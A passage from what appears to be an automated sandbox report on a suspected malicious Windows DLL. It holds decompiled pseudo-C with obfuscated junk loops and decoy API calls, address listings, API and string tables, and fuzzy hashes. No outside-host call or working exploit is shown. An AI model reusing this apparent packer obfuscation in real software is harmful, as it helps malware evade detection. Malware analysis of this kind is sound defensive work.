                                                                                                                                    																		}
                                                                                                                                    																	}
                                                                                                                                    																	goto L78;
                                                                                                                                    																}
                                                                                                                                    																while(1) {
                                                                                                                                    																	__eflags = _t421 -  *0x1000e38c; // 0x27
                                                                                                                                    																	if(__eflags < 0) {
                                                                                                                                    																		goto L71;
                                                                                                                                    																	}
                                                                                                                                    																	_t281 = _t281 + 0x50;
                                                                                                                                    																	_t421 = _t421 - 1;
                                                                                                                                    																	__eflags = _t281 - _t523;
                                                                                                                                    																	 *0x1000e048 = 0x8c;
                                                                                                                                    																	if(_t281 == _t523) {
                                                                                                                                    																		continue;
                                                                                                                                    																	}
                                                                                                                                    																	goto L71;
                                                                                                                                    																}
                                                                                                                                    																goto L71;
                                                                                                                                    															}
                                                                                                                                    															goto L66;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													do {
                                                                                                                                    														_t280 = _t280 - 0x4b;
                                                                                                                                    														__eflags = _t280 - 0x1d1;
                                                                                                                                    														 *0x1000e134 = 0xe8e;
                                                                                                                                    														 *0x1000e10f = 0xb4;
                                                                                                                                    													} while (_t280 <= 0x1d1);
                                                                                                                                    													goto L61;
                                                                                                                                    												} else {
                                                                                                                                    													goto L54;
                                                                                                                                    												}
                                                                                                                                    												while(1) {
                                                                                                                                    													L54:
                                                                                                                                    													__eflags = _t419 - 0xe5;
                                                                                                                                    													if(_t419 != 0xe5) {
                                                                                                                                    														break;
                                                                                                                                    													}
                                                                                                                                    													__eflags = _t520 - 0xec;
                                                                                                                                    													if(_t520 != 0xec) {
                                                                                                                                    														break;
                                                                                                                                    													}
                                                                                                                                    													_t279 = _t279 + 0x8a;
                                                                                                                                    													__eflags = _t279 - _t584;
                                                                                                                                    													_t565 = 0xa5;
                                                                                                                                    													 *0x1000ded7 = 0x62;
                                                                                                                                    													_t419 = 0xe6;
                                                                                                                                    													_t520 = 0x62;
                                                                                                                                    													if(_t279 <= _t584) {
                                                                                                                                    														continue;
                                                                                                                                    													}
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												 *0x1000e14e = _t565;
                                                                                                                                    												goto L58;
                                                                                                                                    											} else {
                                                                                                                                    												_t602 =  *0x1000dfd8; // 0x146
                                                                                                                                    												_t462 = 0x14b - _t278;
                                                                                                                                    												__eflags = 0x14b;
                                                                                                                                    												_t330 =  *0x1000e26c; // 0x10e
                                                                                                                                    												do {
                                                                                                                                    													__eflags = _t330;
                                                                                                                                    													 *0x1000e111 = 0x4c;
                                                                                                                                    													 *0x1000e252 = 0x9d8;
                                                                                                                                    													if(_t330 != 0) {
                                                                                                                                    														L51:
                                                                                                                                    														 *0x1000e3dc = 0x51;
                                                                                                                                    														goto L52;
                                                                                                                                    													}
                                                                                                                                    													__eflags = _t602;
                                                                                                                                    													if(_t602 == 0) {
                                                                                                                                    														goto L52;
                                                                                                                                    													}
                                                                                                                                    													goto L51;
                                                                                                                                    													L52:
                                                                                                                                    													_t462 = _t462 - 1;
                                                                                                                                    													__eflags = _t462;
                                                                                                                                    												} while (_t462 != 0);
                                                                                                                                    												goto L53;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										while(1) {
                                                                                                                                    											__eflags = _t417 - 0x1c9;
                                                                                                                                    											if(_t417 < 0x1c9) {
                                                                                                                                    												break;
                                                                                                                                    											}
                                                                                                                                    											_t277 = _t277 + 1;
                                                                                                                                    											_t417 = _t417 - 1;
                                                                                                                                    											__eflags = _t277 - 0x67;
                                                                                                                                    											_t565 = 0x388;
                                                                                                                                    											 *0x1000e108 = 0x450;
                                                                                                                                    											if(_t277 == 0x67) {
                                                                                                                                    												continue;
                                                                                                                                    											}
                                                                                                                                    											break;
                                                                                                                                    										}
                                                                                                                                    										 *0x1000e14e = _t565;
                                                                                                                                    										goto L45;
                                                                                                                                    									}
                                                                                                                                    									_t578 =  *0x1000dfc4; // 0xe27
                                                                                                                                    									_t364 =  *0x1000e368; // 0x81
                                                                                                                                    									while(1) {
                                                                                                                                    										__eflags = _t276 - 0x27;
                                                                                                                                    										if(_t276 != 0x27) {
                                                                                                                                    											goto L40;
                                                                                                                                    										}
                                                                                                                                    										__eflags = _t583 - _t364;
                                                                                                                                    										if(_t583 != _t364) {
                                                                                                                                    											goto L40;
                                                                                                                                    										}
                                                                                                                                    										_t276 = 0x27 -  *0x1000e348;
                                                                                                                                    										_t416 = _t416 + 1;
                                                                                                                                    										_t583 = _t583 - _t578;
                                                                                                                                    										__eflags = _t416 - _t519;
                                                                                                                                    										 *0x1000e151 = 0x1b;
                                                                                                                                    										 *0x1000e228 = 0x7ca;
                                                                                                                                    										if(_t416 == _t519) {
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    										goto L40;
                                                                                                                                    									}
                                                                                                                                    									goto L40;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t415 - 5;
                                                                                                                                    								if(_t415 > 5) {
                                                                                                                                    									goto L35;
                                                                                                                                    								}
                                                                                                                                    								L34:
                                                                                                                                    								_t275 = _t275 - 1;
                                                                                                                                    								_t415 = _t415 + 0x9e;
                                                                                                                                    								 *0x1000e252 = 0x22;
                                                                                                                                    								 *0x1000e128 = 0x6e9;
                                                                                                                                    								_t517 = _t517 + 1;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							_t559 =  *0x1000df44; // 0xb7
                                                                                                                                    							do {
                                                                                                                                    								_t238 = _t238 + _t559;
                                                                                                                                    								__eflags = _t238 - _t392;
                                                                                                                                    								 *0x1000e236 = 0x35;
                                                                                                                                    								 *0x1000dee0 = 0xe6c;
                                                                                                                                    							} while (_t238 <= _t392);
                                                                                                                                    							goto L28;
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						_t334 = _t201 - _t367 + 1;
                                                                                                                                    						__eflags = _t334;
                                                                                                                                    						do {
                                                                                                                                    							_t334 = _t334 - 1;
                                                                                                                                    							__eflags = _t334;
                                                                                                                                    							 *0x1000e12c = 0xe2;
                                                                                                                                    							 *0x1000e154 = 0x59;
                                                                                                                                    						} while (_t334 != 0);
                                                                                                                                    						goto L18;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				while(_t466 >= 0xd6) {
                                                                                                                                    					_t197 = _t197 - 1;
                                                                                                                                    					_t466 = _t466 - 1;
                                                                                                                                    					 *0x1000dee4 = 0x61;
                                                                                                                                    					 *0x1000e0c5 = 0x63;
                                                                                                                                    					if(_t197 >= _t365) {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L3;
                                                                                                                                    				}
                                                                                                                                    				goto L3;
                                                                                                                                    			}
                                                                                                                                    0x10001f56
                                                                                                                                    0x10001f5c
                                                                                                                                    0x10001f5c
                                                                                                                                    0x10001f5c
                                                                                                                                    0x10001f61
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10001d40
                                                                                                                                    0x10001d40
                                                                                                                                    0x10001f6e
                                                                                                                                    0x10001f74
                                                                                                                                    0x10001f79
                                                                                                                                    0x10001f7e
                                                                                                                                    0x10001f80
                                                                                                                                    0x10001f80
                                                                                                                                    0x10001f89
                                                                                                                                    0x10001f90
                                                                                                                                    0x10001f97
                                                                                                                                    0x10001f9a
                                                                                                                                    0x10001fba
                                                                                                                                    0x10001fba
                                                                                                                                    0x10001fc2
                                                                                                                                    0x10001fe5
                                                                                                                                    0x10001fec
                                                                                                                                    0x10001ff3
                                                                                                                                    0x10001ffa
                                                                                                                                    0x1000201e
                                                                                                                                    0x1000202b
                                                                                                                                    0x10002041
                                                                                                                                    0x1000204c
                                                                                                                                    0x10002052
                                                                                                                                    0x10002058
                                                                                                                                    0x1000205e
                                                                                                                                    0x10002063
                                                                                                                                    0x10002067
                                                                                                                                    0x1000206d
                                                                                                                                    0x10002071
                                                                                                                                    0x10002078
                                                                                                                                    0x1000207c
                                                                                                                                    0x10002080
                                                                                                                                    0x1000208a
                                                                                                                                    0x10002096
                                                                                                                                    0x100020a8
                                                                                                                                    0x100020bb
                                                                                                                                    0x100020d2
                                                                                                                                    0x100020d8
                                                                                                                                    0x100020de
                                                                                                                                    0x100020e4
                                                                                                                                    0x100020e9
                                                                                                                                    0x100020f4
                                                                                                                                    0x100020f8
                                                                                                                                    0x100020fe
                                                                                                                                    0x10002102
                                                                                                                                    0x10002107
                                                                                                                                    0x1000210b
                                                                                                                                    0x10002111
                                                                                                                                    0x10002115
                                                                                                                                    0x1000211b
                                                                                                                                    0x1000211f
                                                                                                                                    0x10002124
                                                                                                                                    0x10002128
                                                                                                                                    0x1000212e
                                                                                                                                    0x10002132
                                                                                                                                    0x10002138
                                                                                                                                    0x1000213f
                                                                                                                                    0x10002144
                                                                                                                                    0x10002152
                                                                                                                                    0x10002159
                                                                                                                                    0x1000216a
                                                                                                                                    0x10002183
                                                                                                                                    0x100021a4
                                                                                                                                    0x100021b9
                                                                                                                                    0x100021d4
                                                                                                                                    0x100021da
                                                                                                                                    0x100021da
                                                                                                                                    0x100021da
                                                                                                                                    0x100021da
                                                                                                                                    0x100021e5
                                                                                                                                    0x100021ec
                                                                                                                                    0x100021f1
                                                                                                                                    0x100021f6
                                                                                                                                    0x10002205
                                                                                                                                    0x10002205
                                                                                                                                    0x10002209
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000220b
                                                                                                                                    0x1000220e
                                                                                                                                    0x10002231
                                                                                                                                    0x10002239
                                                                                                                                    0x10002240
                                                                                                                                    0x10002247
                                                                                                                                    0x1000224a
                                                                                                                                    0x1000224d
                                                                                                                                    0x10002252
                                                                                                                                    0x10002292
                                                                                                                                    0x10002292
                                                                                                                                    0x10002299
                                                                                                                                    0x1000229d
                                                                                                                                    0x100022a3
                                                                                                                                    0x100022aa
                                                                                                                                    0x100022af
                                                                                                                                    0x100022b4
                                                                                                                                    0x100022e6
                                                                                                                                    0x100022e6
                                                                                                                                    0x100022ec
                                                                                                                                    0x100022f2
                                                                                                                                    0x100022f7
                                                                                                                                    0x100022fc
                                                                                                                                    0x100022fe
                                                                                                                                    0x100022fe
                                                                                                                                    0x10002305
                                                                                                                                    0x1000230a
                                                                                                                                    0x1000230f
                                                                                                                                    0x10002352
                                                                                                                                    0x10002352
                                                                                                                                    0x10002357
                                                                                                                                    0x1000235d
                                                                                                                                    0x1000235f
                                                                                                                                    0x10002365
                                                                                                                                    0x10002371
                                                                                                                                    0x100023a4
                                                                                                                                    0x100023a4
                                                                                                                                    0x100023ab
                                                                                                                                    0x100023b0
                                                                                                                                    0x100023d6
                                                                                                                                    0x100023d6
                                                                                                                                    0x100023de
                                                                                                                                    0x100023e3
                                                                                                                                    0x100023e8
                                                                                                                                    0x100023ea
                                                                                                                                    0x100023f1
                                                                                                                                    0x100023f3
                                                                                                                                    0x100023f3
                                                                                                                                    0x100023f1
                                                                                                                                    0x100023fa
                                                                                                                                    0x10002400
                                                                                                                                    0x10002406
                                                                                                                                    0x1000240b
                                                                                                                                    0x1000240e
                                                                                                                                    0x10002419
                                                                                                                                    0x10002419
                                                                                                                                    0x00000000
                                                                                                                                    0x10002410
                                                                                                                                    0x10002410
                                                                                                                                    0x10002417
                                                                                                                                    0x10002423
                                                                                                                                    0x1000242b
                                                                                                                                    0x10002430
                                                                                                                                    0x10002436
                                                                                                                                    0x10002438
                                                                                                                                    0x1000243d
                                                                                                                                    0x10002442
                                                                                                                                    0x10002447
                                                                                                                                    0x1000244c
                                                                                                                                    0x1000244f
                                                                                                                                    0x1000246e
                                                                                                                                    0x10002476
                                                                                                                                    0x10002479
                                                                                                                                    0x1000247c
                                                                                                                                    0x1000247f
                                                                                                                                    0x10002487
                                                                                                                                    0x1000248c
                                                                                                                                    0x10002491
                                                                                                                                    0x10002496
                                                                                                                                    0x1000249b
                                                                                                                                    0x100024a0
                                                                                                                                    0x100024a5
                                                                                                                                    0x10002503
                                                                                                                                    0x10002503
                                                                                                                                    0x1000250c
                                                                                                                                    0x10002513
                                                                                                                                    0x10002518
                                                                                                                                    0x1000251d
                                                                                                                                    0x1000251f
                                                                                                                                    0x1000251f
                                                                                                                                    0x1000252e
                                                                                                                                    0x10002534
                                                                                                                                    0x1000253a
                                                                                                                                    0x1000253c
                                                                                                                                    0x10002551
                                                                                                                                    0x1000255c
                                                                                                                                    0x10002560
                                                                                                                                    0x1000256b
                                                                                                                                    0x1000256e
                                                                                                                                    0x10002573
                                                                                                                                    0x10002592
                                                                                                                                    0x10002592
                                                                                                                                    0x10002599
                                                                                                                                    0x1000259f
                                                                                                                                    0x100025a4
                                                                                                                                    0x100025a9
                                                                                                                                    0x100025b0
                                                                                                                                    0x100025b0
                                                                                                                                    0x100025b4
                                                                                                                                    0x00000000
                                                                                                                                    0x100029d8
                                                                                                                                    0x100029d8
                                                                                                                                    0x00000000
                                                                                                                                    0x100029c0
                                                                                                                                    0x100029b2
                                                                                                                                    0x100028d1
                                                                                                                                    0x100028d1
                                                                                                                                    0x100028d7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028e0
                                                                                                                                    0x100028e2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028e4
                                                                                                                                    0x100028e7
                                                                                                                                    0x100028ea
                                                                                                                                    0x100028ec
                                                                                                                                    0x100028f3
                                                                                                                                    0x100028fd
                                                                                                                                    0x10002903
                                                                                                                                    0x1000290a
                                                                                                                                    0x1000290f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000290f
                                                                                                                                    0x00000000
                                                                                                                                    0x100028d1
                                                                                                                                    0x10002870
                                                                                                                                    0x10002870
                                                                                                                                    0x10002872
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000287b
                                                                                                                                    0x1000287d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000287f
                                                                                                                                    0x10002882
                                                                                                                                    0x10002885
                                                                                                                                    0x1000288b
                                                                                                                                    0x10002890
                                                                                                                                    0x10002895
                                                                                                                                    0x1000289b
                                                                                                                                    0x100028a1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100028a1
                                                                                                                                    0x00000000
                                                                                                                                    0x1000280c
                                                                                                                                    0x10002820
                                                                                                                                    0x10002820
                                                                                                                                    0x10002822
                                                                                                                                    0x10002825
                                                                                                                                    0x1000282b
                                                                                                                                    0x10002832
                                                                                                                                    0x10002832
                                                                                                                                    0x00000000
                                                                                                                                    0x10002820
                                                                                                                                    0x1000280a
                                                                                                                                    0x100027a5
                                                                                                                                    0x100027a5
                                                                                                                                    0x100027a9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100027ab
                                                                                                                                    0x100027ae
                                                                                                                                    0x100027b1
                                                                                                                                    0x100027b4
                                                                                                                                    0x100027ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100027ba
                                                                                                                                    0x00000000
                                                                                                                                    0x100027a5
                                                                                                                                    0x10002756
                                                                                                                                    0x1000275c
                                                                                                                                    0x10002762
                                                                                                                                    0x10002762
                                                                                                                                    0x10002766
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000276c
                                                                                                                                    0x1000276f
                                                                                                                                    0x10002779
                                                                                                                                    0x1000277b
                                                                                                                                    0x1000277b
                                                                                                                                    0x10002785
                                                                                                                                    0x1000278b
                                                                                                                                    0x1000278e
                                                                                                                                    0x10002790
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002790
                                                                                                                                    0x00000000
                                                                                                                                    0x1000271b
                                                                                                                                    0x1000271b
                                                                                                                                    0x10002723
                                                                                                                                    0x10002723
                                                                                                                                    0x10002725
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002727
                                                                                                                                    0x1000272c
                                                                                                                                    0x10002732
                                                                                                                                    0x10002736
                                                                                                                                    0x1000273c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000273c
                                                                                                                                    0x00000000
                                                                                                                                    0x10002723
                                                                                                                                    0x10002719
                                                                                                                                    0x100026be
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d0
                                                                                                                                    0x100026d3
                                                                                                                                    0x100026d3
                                                                                                                                    0x00000000
                                                                                                                                    0x100026d0
                                                                                                                                    0x10002662
                                                                                                                                    0x10002669
                                                                                                                                    0x10002675
                                                                                                                                    0x10002675
                                                                                                                                    0x1000267b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000267d
                                                                                                                                    0x10002680
                                                                                                                                    0x10002686
                                                                                                                                    0x10002695
                                                                                                                                    0x10002697
                                                                                                                                    0x10002699
                                                                                                                                    0x10002699
                                                                                                                                    0x10002697
                                                                                                                                    0x100026a0
                                                                                                                                    0x100026a3
                                                                                                                                    0x100026a6
                                                                                                                                    0x100026aa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100026aa
                                                                                                                                    0x00000000
                                                                                                                                    0x10002675
                                                                                                                                    0x1000260e
                                                                                                                                    0x10002614
                                                                                                                                    0x10002614
                                                                                                                                    0x10002619
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1000261b
                                                                                                                                    0x1000261f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002621
                                                                                                                                    0x10002624
                                                                                                                                    0x10002626
                                                                                                                                    0x1000262c
                                                                                                                                    0x1000262e
                                                                                                                                    0x10002635
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10002635
                                                                                                                                    0x00000000
                                                                                                                                    0x10002614
                                                                                                                                    0x100025c3
                                                                                                                                    0x100025c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x100025ca
                                                                                                                                    0x100025ca
                                                                                                                                    0x100025cc
                                                                                                                                    0x100025cf
                                                                                                                                    0x100025d6
                                                                                                                                    0x100025d6
                                                                                                                                    0x100025b0
                                                                                                                                    0x10002575
                                                                                                                                    0x10002580
                                                                                                                                    0x10002580
                                                                                                                                    0x10002584
                                                                                                                                    0x10002589
                                                                                                                                    0x10002589
                                                                                                                                    0x00000000
                                                                                                                                    0x10002540
                                                                                                                                    0x10002540
                                                                                                                                    0x10002540

                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,CloseFarmhouse32,00000086,_DrawPossible64,00000086,?,?,000000C1,000000C1), ref: 10001D67
                                                                                                                                    • closesocket.WS2_32(0000014A), ref: 10001D6E
                                                                                                                                    • CoRevokeClassObject.OLE32(0000014A), ref: 10001D75
                                                                                                                                    • CoFileTimeNow.OLE32(?), ref: 10001D7C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassCreateFileObjectRevokeTimeclosesocket
                                                                                                                                    • String ID: 2$3$A$CloseFarmhouse32$EnumMicrophyte32$Erodium$SeemNicotinamide32$StandMarmite$TakePenult32$V$_DrawPossible64$c$e$e$i$k$l$l$l$l$n$o$ps$r$r$t$u
                                                                                                                                    • API String ID: 769704860-91181023
                                                                                                                                    • Opcode ID: 6a5b50da9a18bc4620d4d740d753d8a4242cd2b0910a8c730c5ca6e004029671
                                                                                                                                    • Instruction ID: d7a533ed34c0357ead6766cc085aedc84edb46e692d9504d8a6007d1625a7fff
                                                                                                                                    • Opcode Fuzzy Hash: 6a5b50da9a18bc4620d4d740d753d8a4242cd2b0910a8c730c5ca6e004029671
                                                                                                                                    • Instruction Fuzzy Hash: 0B92DF755083A18BF304CF24CCC4AAA7BE5F799380F04892EE985973ADD7749D84CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E10002C30() {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				char _v68;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				intOrPtr _v76;
                                                                                                                                    				char _v78;
                                                                                                                                    				short _v80;
                                                                                                                                    				char _v84;
                                                                                                                                    				intOrPtr _v88;
                                                                                                                                    				struct _SECURITY_ATTRIBUTES _v92;
                                                                                                                                    				char _v96;
                                                                                                                                    				void _v100;
                                                                                                                                    				void* _v104;
                                                                                                                                    				char _v108;
                                                                                                                                    				char _v112;
                                                                                                                                    				char _v116;
                                                                                                                                    				char _v120;
                                                                                                                                    				char _v124;
                                                                                                                                    				intOrPtr _v128;
                                                                                                                                    				intOrPtr _v132;
                                                                                                                                    				char _v136;
                                                                                                                                    				void* _v148;
                                                                                                                                    				void* _v152;
                                                                                                                                    				void _v156;
                                                                                                                                    				long _v160;
                                                                                                                                    				long _v164;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed int _t72;
                                                                                                                                    				int _t74;
                                                                                                                                    				struct _SECURITY_ATTRIBUTES _t86;
                                                                                                                                    				short _t87;
                                                                                                                                    				intOrPtr _t95;
                                                                                                                                    				char _t96;
                                                                                                                                    				char _t97;
                                                                                                                                    				intOrPtr _t98;
                                                                                                                                    				intOrPtr* _t114;
                                                                                                                                    				void* _t115;
                                                                                                                                    				CHAR* _t121;
                                                                                                                                    				intOrPtr _t124;
                                                                                                                                    				char _t125;
                                                                                                                                    				intOrPtr _t129;
                                                                                                                                    				intOrPtr _t130;
                                                                                                                                    				char _t131;
                                                                                                                                    				intOrPtr _t132;
                                                                                                                                    				intOrPtr _t139;
                                                                                                                                    				char _t150;
                                                                                                                                    				char _t151;
                                                                                                                                    				char _t155;
                                                                                                                                    				intOrPtr _t157;
                                                                                                                                    				char _t158;
                                                                                                                                    				intOrPtr* _t168;
                                                                                                                                    				void* _t169;
                                                                                                                                    				void* _t172;
                                                                                                                                    				signed int _t173;
                                                                                                                                    
                                                                                                                                    				_t175 = (_t173 & 0xfffffff8) - 0x6c;
                                                                                                                                    				_t72 =  *0x1000e420; // 0x44ea7bf2
                                                                                                                                    				_v8 = _t72 ^ (_t173 & 0xfffffff8) - 0x0000006c;
                                                                                                                                    				_t114 = __imp__CoRevokeClassObject;
                                                                                                                                    				_t74 = 0x86;
                                                                                                                                    				_t168 = __imp__#3; // 0x73eced70
                                                                                                                                    				_v108 = 0x14a;
                                                                                                                                    				_v104 = 0x86;
                                                                                                                                    				_v100 = 0xc1;
                                                                                                                                    				_v96 = 0x4be;
                                                                                                                                    				while(1) {
                                                                                                                                    					RegCreateKeyExW( &_v100, L"CloseFarmhouse32", _t74, L"_DrawPossible64", _t74,  &_v100,  &_v92,  &_v104,  &_v100);
                                                                                                                                    					 *_t168( &_v108);
                                                                                                                                    					 *_t114(_v112);
                                                                                                                                    					__imp__CoFileTimeNow( &_v112);
                                                                                                                                    					_t121 =  &_v120;
                                                                                                                                    					__imp__CoInitializeSecurity( &_v116, _t121, _t121,  &_v112, _v120, _v112,  &_v116, _v116,  &_v120);
                                                                                                                                    					CreatePrivateObjectSecurity( &_v148,  &_v156,  &_v156,  &_v148,  &_v156, _t122); // executed
                                                                                                                                    					DisconnectNamedPipe( &_v148);
                                                                                                                                    					_t150 = "SeemNicotinamide32"; // 0x6d656553
                                                                                                                                    					_t86 = M1000A1F4; // 0x6f63694e
                                                                                                                                    					_t124 = M1000A1F8; // 0x616e6974
                                                                                                                                    					_v96 = _t150;
                                                                                                                                    					_t151 = M1000A1FC; // 0x6564696d
                                                                                                                                    					_v92 = _t86;
                                                                                                                                    					_t87 =  *0x1000a200; // 0x3233
                                                                                                                                    					_v84 = _t151;
                                                                                                                                    					_v88 = _t124;
                                                                                                                                    					_t125 =  *0x1000a202; // 0x0
                                                                                                                                    					_v80 = _t87;
                                                                                                                                    					_v78 = _t125;
                                                                                                                                    					EnumResourceNamesA( &_v156,  &_v96,  &_v152,  &_v148);
                                                                                                                                    					EnumResourceTypesW( &_v160,  &_v160,  &_v152);
                                                                                                                                    					LockFile( &_v156, _v156, _v164, _v164, _v164);
                                                                                                                                    					_t155 = "StandMarmite"; // 0x6e617453
                                                                                                                                    					_t95 = M1000A1E4; // 0x72614d64
                                                                                                                                    					_t129 =  *0x1000a1e8; // 0x6574696d
                                                                                                                                    					_v136 = _t155;
                                                                                                                                    					_v132 = _t95;
                                                                                                                                    					_t96 = "TakePenult32"; // 0x656b6154
                                                                                                                                    					_v128 = _t129;
                                                                                                                                    					_t130 = M1000A1D4; // 0x756e6550
                                                                                                                                    					_v124 =  *0x1000a1ec & 0x000000ff;
                                                                                                                                    					_t157 =  *0x1000a1d8; // 0x3233746c
                                                                                                                                    					_v120 = _t96;
                                                                                                                                    					_t97 =  *0x1000a1dc; // 0x0
                                                                                                                                    					_v116 = _t130;
                                                                                                                                    					_t131 = "EnumMicrophyte32"; // 0x6d756e45
                                                                                                                                    					_v112 = _t157;
                                                                                                                                    					_t158 = M1000A1C0; // 0x7263694d
                                                                                                                                    					_v108 = _t97;
                                                                                                                                    					_t98 = M1000A1C4; // 0x7968706f
                                                                                                                                    					_v84 = _t131;
                                                                                                                                    					_t132 =  *0x1000a1c8; // 0x32336574
                                                                                                                                    					_v80 = _t158;
                                                                                                                                    					_v76 = _t98;
                                                                                                                                    					_v72 = _t132;
                                                                                                                                    					_v68 =  *0x1000a1cc & 0x000000ff;
                                                                                                                                    					LookupPrivilegeDisplayNameA( &_v136,  &_v120,  &_v84,  &_v160,  &_v164); // executed
                                                                                                                                    					ReadEventLogW( &_v164, _v160, _v164,  &_v164, _v164,  &_v164,  &_v156);
                                                                                                                                    					SetupComm( &_v164, _v164, _v156);
                                                                                                                                    					WriteFile( &_v156,  &_v156, _v164,  &_v164,  &_v164); // executed
                                                                                                                                    					_t69 =  &_v152;
                                                                                                                                    					 *_t69 = _v152 - 1;
                                                                                                                                    					if( *_t69 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_t74 = _v160;
                                                                                                                                    				}
                                                                                                                                    				_t139 =  *0x1000e350; // 0x13a
                                                                                                                                    				_t166 =  *0x1000e3c4;
                                                                                                                                    				if( *0x1000e3c4 >= _t139 -  *0x1000e368) {
                                                                                                                                    					 *0x1000e14c = 0xb0e;
                                                                                                                                    				}
                                                                                                                                    				_pop(_t169);
                                                                                                                                    				_pop(_t172);
                                                                                                                                    				_pop(_t115);
                                                                                                                                    				return E10002ECD(1, _t115, _v64 ^ _t175, _t166, _t169, _t172);
                                                                                                                                    			}


                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,CloseFarmhouse32,00000086,_DrawPossible64,00000086,?,?,000000C1,000000C1), ref: 10002CA7
                                                                                                                                    • closesocket.WS2_32(0000014A), ref: 10002CAE
                                                                                                                                    • CoRevokeClassObject.OLE32(0000014A), ref: 10002CB5
                                                                                                                                    • CoFileTimeNow.OLE32(?), ref: 10002CBC
                                                                                                                                    • CoInitializeSecurity.OLE32(?,?,?,?,000000C1,?,?,?,0000014A), ref: 10002CED
                                                                                                                                    • CreatePrivateObjectSecurity.KERNELBASE(?,0000014A,0000014A,?,0000014A,0000014A), ref: 10002D03
                                                                                                                                    • DisconnectNamedPipe.KERNELBASE(000000C1), ref: 10002D0E
                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,000000C1,000000C1), ref: 10002D64
                                                                                                                                    • EnumResourceTypesW.KERNEL32(?,?,000000C1), ref: 10002D77
                                                                                                                                    • LockFile.KERNEL32(?,?,0000014A,0000014A,0000014A), ref: 10002D8E
                                                                                                                                    • LookupPrivilegeDisplayNameA.ADVAPI32(?,?,?,000000C1,0000014A), ref: 10002E2D
                                                                                                                                    • ReadEventLogW.ADVAPI32(?,000000C1,000000C1,?,000000C1,?,000000C1), ref: 10002E50
                                                                                                                                    • SetupComm.KERNEL32(000000C1,0000014A,000000C1), ref: 10002E65
                                                                                                                                    • WriteFile.KERNELBASE(?,?,0000014A,0000014A,0000014A), ref: 10002E80
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp
                                                                                                                                    Similarity
